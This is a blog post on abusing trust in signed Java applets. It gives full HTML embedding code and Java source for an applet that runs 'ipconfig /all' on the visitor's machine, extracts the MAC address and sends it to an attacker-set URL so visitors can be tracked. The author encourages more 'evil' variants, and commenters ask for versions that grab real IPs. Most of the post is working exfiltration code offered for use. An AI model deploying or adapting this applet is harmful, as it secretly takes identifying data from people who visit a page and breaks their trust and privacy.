Trusting Java Applets

abusing the trust people have in signed applets.

It’s been blogged before but oh well I always learn by example so here is an example. The thing I’m talking about is trusting signed java applets. In short when you trust a java applet it can do whatever it wants. So what could you do with a java applet? The java source code will steal your mac address, rather useless but it serves the example purpose good enough. The stolen mac address get’s submitted to a page in this case it will be google which will look like this:

http://www.google.com/bleh=00-0C-29-F6-E2-A8

So on the serverside you can just match ip + mac address and build yourself a (maybe) useless database. you could also make some code which does more evil stuff instead of just steal the mac address.

Are you wondering how to sign an java applet? visit the following url:

http://java.sun.com/j2se/1.5.0/docs/guide/plugin/developer_guide/rsa_signing.html

The html code to embed the applet in your html page is as follow:

<HTML>
<HEAD>
<TITLE&gt;Get MacAddress Applet&lt;/TITLE>
</HEAD>
Get MacAddress applet<BR>
<applet code="GetMacAddress.class" archive="GetMacAddress.jar" width=1 height=1>
<PARAM NAME="BASEURL" VALUE="http://www.google.com/bleh=">
</applet>
</BODY>
</HTML>

So now for the example code of the “evil” applet.

import java.applet.Applet;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * This applet gets the mac address from a windows machine
 * @author DiabloHorn
 */
public class GetMacAddress extends Applet {

    /** Creates a new instance of GetMacAddress*/
     public void init() {
         try{
            String macAddress = this.getMacAddress();
            URL url = new URL(this.getParameter("BASEURL")+macAddress);
            getAppletContext().showDocument(url, "_self");
         }catch(Exception e){
             System.out.println(e);
         }
     }

    public String getMacAddress() throws IOException {
        String macAddress = null;
        String command = "ipconfig /all";
        Process pid = Runtime.getRuntime().exec(command);
        BufferedReader in = new BufferedReader(new InputStreamReader(pid.getInputStream()));
        while (true) {
            String line = in.readLine();
            if (line == null) {
                break;
            }

            Pattern p = Pattern.compile(".*((:?[0-9a-f]{2}[-:]){5}[0-9a-f]{2}).*",Pattern.CASE_INSENSITIVE);
            Matcher m = p.matcher(line);
            if (m.matches()) {
                macAddress = m.group(1);
                break;
            }
        }
        in.close();
        return macAddress;
    }
}

5 thoughts on “Trusting Java Applets”

  1. Pingback: Java in-memory class loading « DiabloHorn

  2. If you modify the command it might work yes, I haven’t had the time to test it out. My point was more about signed applets and the endless possibilities.

  3. Hi!
    As far as I know, “ipconfig /all” is for MS Windows. So do you think this applet will be works on the client running linux?

    Please answer me.

  5. Hi,

    Do you have java/applet code that can get the real ip? Thanks…

    Regards,

    Wong

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.